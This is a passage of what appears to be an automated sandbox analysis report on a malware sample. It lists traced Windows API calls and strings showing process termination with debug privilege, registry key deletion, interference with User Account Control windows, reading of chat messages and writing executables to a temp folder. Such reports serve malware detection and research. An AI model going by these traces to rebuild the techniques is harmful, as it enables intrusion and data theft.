                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040DDC2,00000000,00000000,?), ref: 0040EA7E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0040EA89
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcpy$CreateSleepThread$CountTickhtonslstrcatlstrlen
                                                                                                                                                                                                                                                      • String ID: http://
                                                                                                                                                                                                                                                      • API String ID: 3177099081-1121587658
                                                                                                                                                                                                                                                      • Opcode ID: d093209fb2e0adf6becd6f0071fc5a182011687f8f701b80cf4c033edade39ce
                                                                                                                                                                                                                                                      • Instruction ID: ce0d3c27ecb2eeb20cac135d9def360aaa073816567bcac841eaba6cd55d9888
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d093209fb2e0adf6becd6f0071fc5a182011687f8f701b80cf4c033edade39ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5151D4B0604744EFC7219F35C845AD77BA8BF05314F00083EF96E96292D738A925CB6D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentProcess.KERNEL32(00000028,0040D4C0,76AF0F00,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D5A
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenProcessToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D61
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentThread.KERNEL32 ref: 00413D74
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenThreadToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D7B
                                                                                                                                                                                                                                                      • EnumProcesses.PSAPI(?,00001000,Oa@,?,0040614F,svchost.exe,0040D4DF), ref: 004147BA
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,unknown,776AC310,76AF0F00,?,0040614F,svchost.exe,0040D4DF), ref: 004147EB
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000411,00000000,?,?,0040614F,svchost.exe,0040D4DF), ref: 004147FA
                                                                                                                                                                                                                                                      • EnumProcessModules.PSAPI(00000000,?,00000004,Oa@,?,0040614F,svchost.exe,0040D4DF), ref: 00414811
                                                                                                                                                                                                                                                      • GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,0040614F,svchost.exe,0040D4DF), ref: 0041482B
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 0041483B
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,0040614F,svchost.exe,0040D4DF), ref: 00414847
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,0040614F,svchost.exe,0040D4DF), ref: 00414856
                                                                                                                                                                                                                                                      • EnumWindows.USER32(00405FD0,?), ref: 00414869
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$EnumOpen$CurrentThreadToken$BaseCloseHandleModuleModulesNameProcessesTerminateWindowslstrcmpilstrcpy
                                                                                                                                                                                                                                                      • String ID: Oa@$SeDebugPrivilege$unknown
                                                                                                                                                                                                                                                      • API String ID: 3406098452-2184523643
                                                                                                                                                                                                                                                      • Opcode ID: ec7a13c7402dd98315d9eac9f825c4482461187d57bd2692ff82ea6a035ee5ef
                                                                                                                                                                                                                                                      • Instruction ID: 6aacd8d1ff4dbd8605ebb6ac42f1bfe4b727bf0c1f85d46be98a7d10ae3bfef4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec7a13c7402dd98315d9eac9f825c4482461187d57bd2692ff82ea6a035ee5ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB219431600259BBDB219BA0DC09BEF77BCAF40B05F4000AAFA14E1190DB78DA85CB39
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004152B8
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 004152C5
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004152CF
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 0041532A
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,000000FF,?,00000000,00000258,000001F4,00000040), ref: 00415342
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 0041534B
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00415358
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00415361
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00415364
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00415367
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041536A
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041536D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00415371
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 0041537A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$FocusForegroundShow$Rect$DesktopSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2688408617-0
                                                                                                                                                                                                                                                      • Opcode ID: 7a5f6fd0b964fbab2bffc776ebc7f412676fa13c8af691ab0b398f89b03bcf89
                                                                                                                                                                                                                                                      • Instruction ID: 39c56666d41452987d3b7fe9305ed56471eecf7891ea7fa0ab7c3d1c71a8f08c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a5f6fd0b964fbab2bffc776ebc7f412676fa13c8af691ab0b398f89b03bcf89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45219472A00319EBCB10EBB5DD88EDE7B7DEB84350F104556E612B3185CB78A581CFA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00410A33: EnterCriticalSection.KERNEL32(00459674,?,?,00000000,?,?,00405B7A), ref: 00410A40
                                                                                                                                                                                                                                                        • Part of subcall function 00410A33: LeaveCriticalSection.KERNEL32(00459674,?,?,00000000,?,?,00405B7A), ref: 00410A70
                                                                                                                                                                                                                                                      • SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                      • SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,?), ref: 00405CA4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405D02
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,?), ref: 00405D36
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0044F7E0), ref: 00405D70
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$Delete$EnterLeaveWindowlstrcmpilstrlen$CloseCreateDesktopRectValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3629881134-0
                                                                                                                                                                                                                                                      • Opcode ID: 8c2247e16eec6ba48e2775c11e4c53cfa32d9f1054ca30fa9e768faa9959b77b
                                                                                                                                                                                                                                                      • Instruction ID: 2034163c18fc6c54253ab763adb56740a824e02f721f4af71a6baf50f169b6c5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c2247e16eec6ba48e2775c11e4c53cfa32d9f1054ca30fa9e768faa9959b77b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4651F676904614ABEB20BBA19C0AADB77ACEB10305F50407BF541B6181DB786EC48F2D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041E045
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: EnterCriticalSection.KERNEL32(0045B020), ref: 0041D055
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: lstrlenA.KERNEL32(?), ref: 0041D066
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: SendMessageA.USER32(0000004A,00000000), ref: 0041D082
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: LeaveCriticalSection.KERNEL32(0045B020), ref: 0041D092
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041E079
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041E0B1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0041E0C5
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041E0D8
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041E0FB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0041E113
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0041E126
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • GET MESSAGE %d BODY, xrefs: 0041E0AB
                                                                                                                                                                                                                                                      • GET CHAT %s TIMESTAMP, xrefs: 0041E03F
                                                                                                                                                                                                                                                      • GET MESSAGE %d PARTNER_HANDLE, xrefs: 0041E0D2
                                                                                                                                                                                                                                                      • GET MESSAGE %d TIMESTAMP, xrefs: 0041E0F5
                                                                                                                                                                                                                                                      • GET CHAT %s CHATMESSAGES, xrefs: 0041E073
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: wsprintf$Sleep$CriticalSection$EnterLeaveMessageSendlstrlen
                                                                                                                                                                                                                                                      • String ID: GET CHAT %s CHATMESSAGES$GET CHAT %s TIMESTAMP$GET MESSAGE %d BODY$GET MESSAGE %d PARTNER_HANDLE$GET MESSAGE %d TIMESTAMP
                                                                                                                                                                                                                                                      • API String ID: 2111711390-799739332
                                                                                                                                                                                                                                                      • Opcode ID: 65ef290f7743c204c3dab036e9bae9a06310898df4735f64461e61f8546b4ab2
                                                                                                                                                                                                                                                      • Instruction ID: 286149aadfd70b27aca77458672cdbd0162cbc00d1eafd4ae75ea191c458330e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65ef290f7743c204c3dab036e9bae9a06310898df4735f64461e61f8546b4ab2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0741F875E00318ABEF319FA5C844BCB7FA8AF14304F0444AAED5056242D7BD96C9CBA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDateFormatA.KERNEL32(00000409,00000000,00000000,ddd, dd MMM yyyy,?,00000046), ref: 00411D21
                                                                                                                                                                                                                                                      • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,0000001E), ref: 00411D35
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411D7A
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,<h1>%s</h1>,?), ref: 00411DC8
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411DD2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00411DDF
                                                                                                                                                                                                                                                      • send.WS2_32(?,?,00000000), ref: 00411DEC
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • <h1>%s</h1>, xrefs: 00411DBC
                                                                                                                                                                                                                                                      • ddd, dd MMM yyyy, xrefs: 00411D12
                                                                                                                                                                                                                                                      • You need Microsoft Windows operating system in order to view this page., xrefs: 00411D7C
                                                                                                                                                                                                                                                      • HH:mm:ss, xrefs: 00411D2D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Formatlstrlenwsprintf$DateTimesend
                                                                                                                                                                                                                                                      • String ID: You need Microsoft Windows operating system in order to view this page.$<h1>%s</h1>$HH:mm:ss$ddd, dd MMM yyyy
                                                                                                                                                                                                                                                      • API String ID: 3801612084-1440507290
                                                                                                                                                                                                                                                      • Opcode ID: 62141dda1aecad969a0ae61eaf8fc5eef7e2a53e9aa8d847ddc7f911dc446f22
                                                                                                                                                                                                                                                      • Instruction ID: 3175033ef80f5511cd34c8e73323197f1559dbbf78c17265ad78bbdfeb19af6b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62141dda1aecad969a0ae61eaf8fc5eef7e2a53e9aa8d847ddc7f911dc446f22
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9210AB2A0011CBBDB21DBD4EC85EEF77BCEB08314F544066FA08E3141E675AA558BA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00415B66
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00000080), ref: 00415B7D
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00415BB2
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000001), ref: 00415BBB
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000009), ref: 00415BC4
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 00415BD3
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00415BF1
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00415C02
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Showlstrlen$ClassForegroundMessageNamePostSleepTextVisible
                                                                                                                                                                                                                                                      • String ID: Registry Edi$User Account Control$tooltips_class32
                                                                                                                                                                                                                                                      • API String ID: 4180102081-1509812080
                                                                                                                                                                                                                                                      • Opcode ID: d7f2bc4ca5da4d540acb64fe4ee722e67498b18307d0434090dc870e78a0f9e3
                                                                                                                                                                                                                                                      • Instruction ID: c93e245c32f7781a02f2af87d642a4a6c60f2c6d5a6879bb70ae2635c1db68f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7f2bc4ca5da4d540acb64fe4ee722e67498b18307d0434090dc870e78a0f9e3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD110AB6305214BFE721AB60AD0AFDB376CEF09715F10006BF941E11C0DAACA6D1867E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00401BCE
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00401BE0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00401BF2
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00401C1F
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401C36
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00401C4F
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401C5F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileSleep$Heap$AllocateAttributesCloseCreateHandleProcessWrite
                                                                                                                                                                                                                                                      • String ID: M$This program cannot be run in DOS mode$Z
                                                                                                                                                                                                                                                      • API String ID: 4125413447-1994174348
                                                                                                                                                                                                                                                      • Opcode ID: a684f589866e2ba1cbdaeb2e4603d1b4e02b3a4d726e3c360d769efadd1e9600
                                                                                                                                                                                                                                                      • Instruction ID: 063c169d53d94c2206d9bba7a4140ac5560a49d2057c7dfedb851ee6bbf89c05
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a684f589866e2ba1cbdaeb2e4603d1b4e02b3a4d726e3c360d769efadd1e9600
